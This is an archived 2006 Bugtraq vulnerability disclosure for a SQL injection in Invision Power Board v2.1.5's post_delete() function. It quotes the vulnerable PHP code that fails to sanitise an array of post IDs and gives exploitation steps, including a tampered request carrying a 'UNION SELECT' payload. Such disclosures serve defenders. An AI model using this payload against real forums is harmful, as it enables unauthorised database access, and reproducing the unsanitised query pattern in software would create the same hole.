lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 28 Apr 2006 08:21:50 -0000 From: o.y.6@...mail.com To: bugtraq@...urityfocus.com Subject: Invision Power Board v2.1.5 Remote SQL Injection Invision Power Board v2.1.5 Remote SQL Injection Filename :- func_mod.php Functionname :- post_delete() Lines :- 89 To 209 Bug Found By :- Devil-00 Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^ www.securtygurus.net [Code] if ( is_array( $id ) ) { if ( count($id) > 0 ) { $pid = " IN(".implode(",",$id).")"; } else { return FALSE; } } else { if ( intval($id) ) { $pid = "=$id"; } else { return FALSE; } } [/CODE] When $id = array .. the code don't check it if ( INTVAL ) [CODE] if ( count($id) > 0 ) { $pid = " IN(".implode(",",$id).")"; } [/CODE] Then We Can Do SQL Injection Here >> [CODE] $this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) ); [/CODE] And Here >> [CODE] $this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) ); [/CODE] Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :( Exm. To Exploit 1- First Add 2 Post 2- Check It To Delete 3- Edit String Query By HTTPLiveHeader [CODE] act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete [/CODE]
Powered by blists - more mailing lists